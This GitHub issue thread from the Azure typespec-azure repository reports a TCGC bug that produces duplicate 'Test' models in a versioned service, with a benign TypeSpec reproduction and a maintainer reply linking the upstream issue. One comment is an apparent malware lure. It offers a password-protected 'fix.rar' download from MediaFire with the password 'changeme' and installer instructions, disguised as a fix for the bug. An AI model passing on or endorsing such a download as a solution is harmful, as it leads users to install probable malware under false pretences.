### ISSUE TITLE
[Bug]: tcgc, duplicate model with same name, in versioned service

### ISSUE THREAD

**Issue by weidongxu-microsoft** [Azure/typespec-azure#1429]
### Describe the bug

bug on unreleased TCGC (around [0.46.0-dev.20](https://www.npmjs.com/package/@azure-tools/typespec-client-generator-core/v/0.46.0-dev.20))

When handling model that be used in operation with spread, and in normal non-spread operation. (`model Test` in below), TCGC would contain 2 model of same name.

![image](https://github.com/user-attachments/assets/699878d6-2607-4ff1-a6be-fc0c03f506a9)

### Reproduction

```ts
import "@typespec/rest";
import "@typespec/versioning";
import "@azure-tools/typespec-client-generator-core";
 
using TypeSpec.Http;
using TypeSpec.Versioning;
using Azure.ClientGenerator.Core;
 
@service({
  title: "Flatten",
})
@server(
  "{endpoint}/openai",
  "Flatten",
  {
    endpoint: string,
  }
)
@versioned(ServiceApiVersions)
namespace Cadl.Flatten;
 
enum ServiceApiVersions {
  v2022_06_01_preview: "2022-06-01-preview",
}
 
model Test {
  name: string;
}
 
model Ref {
  prop: Test;
}
 
@client({
  service: Cadl.Flatten,
  name: "FlattenClient",
})
@route("/flatten")
interface FlattenOp {
 
  @route("modelref1")
  @post
  ref1(...Test): void;
 
  @route("modelref2")
  @post
  ref2(@body body: Ref): void;
}
```

TCGC would have 3 models in sdkPackage. 2 `Test` and 1 `Ref`.

It does not happen if we remove `@versioned(ServiceApiVersions)`.

### Checklist

- [X] Follow our [Code of Conduct](https://github.com/azure/typespec-azure/blob/main/CODE_OF_CONDUCT.md)
- [X] Check that this issue is about the Azure libraries for typespec. For bug in the typespec language or core libraries file it in the [TypeSpec repo](https://github.com/Microsoft/TypeSpec/issues/new/choose)
- [X] Check that there isn't already an issue that request the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tadelesh** [comment]
the original issue is from typespec: https://github.com/microsoft/typespec/issues/4280, but could be handled in tcgc.
